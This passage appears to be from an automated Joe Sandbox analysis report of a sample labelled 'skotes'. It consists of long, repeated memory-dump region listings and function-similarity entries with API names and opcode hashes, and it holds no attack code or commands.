                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Time$LocalSpecificSystem
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2574697306-0
                                                                                                                                                                                            • Opcode ID: ebec46bb5b4ac9e84359564a93b9cdb8c22589271a4d37d2c494fcef741e613a
                                                                                                                                                                                            • Instruction ID: d5f12136b5581d3fcb6616ca841d55880a870df00bbf90ff5ea6f8198f9802b8
                                                                                                                                                                                            • Opcode Fuzzy Hash: ebec46bb5b4ac9e84359564a93b9cdb8c22589271a4d37d2c494fcef741e613a
                                                                                                                                                                                            • Instruction Fuzzy Hash: A911FEB390410DABDB20DED5C985EDF77BDAF09314F545266E511E2180EB30EA49CBA1
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: __wsopen_s
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3347428461-0
                                                                                                                                                                                            • Opcode ID: 3034857b3dc3aaedac800f9252c87b8b92d4936d8659b983bd5638a025f36ca8
                                                                                                                                                                                            • Instruction ID: e1a2e14f5bf0ad7126fdcb56be6500ad187e959dd3c7d2644e2a1c069fc35dae
                                                                                                                                                                                            • Opcode Fuzzy Hash: 3034857b3dc3aaedac800f9252c87b8b92d4936d8659b983bd5638a025f36ca8
                                                                                                                                                                                            • Instruction Fuzzy Hash: AF1115B1A0420AAFCB09DF98E94199A7BF5EF48304F044069F809AB351D670EE21DBA5
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,8FC8FEA1,?,?,0061D3FC,8FC8FEA1,?,00617A8B,?,?,?,?,?,?,00607465,?), ref: 0063B07E
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                            • Opcode ID: 7da88b2d4ef150b01fa2fb36ef5fac015df6170571b76c0bbaae66f00bae7ea2
                                                                                                                                                                                            • Instruction ID: 2fae5cfb8766799a975f471be660241655f36e2326949f599bc0edd4c1cba4e4
                                                                                                                                                                                            • Opcode Fuzzy Hash: 7da88b2d4ef150b01fa2fb36ef5fac015df6170571b76c0bbaae66f00bae7ea2
                                                                                                                                                                                            • Instruction Fuzzy Hash: BBE0653514121596D77532759D41BDFB64BDF813B0F152210EFA496290DB90DD0085E5
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • CreateFileW.KERNEL32(00000000,00000000,?,00641B65,?,?,00000000,?,00641B65,00000000,0000000C), ref: 00641792
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                            • Opcode ID: 338090606fac5edc2bbd4f15ae98e09a3a69787029ab8c25ad59785c7f3e9969
                                                                                                                                                                                            • Instruction ID: 6f8278bb038245104af671d549b1b613887eee4b520f8484e29f4dfb4856cf9c
                                                                                                                                                                                            • Opcode Fuzzy Hash: 338090606fac5edc2bbd4f15ae98e09a3a69787029ab8c25ad59785c7f3e9969
                                                                                                                                                                                            • Instruction Fuzzy Hash: 77D06C3214020DBBDF129E84DC06EDA3BAAAB48654F014100BE5866060C776E861AB94
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
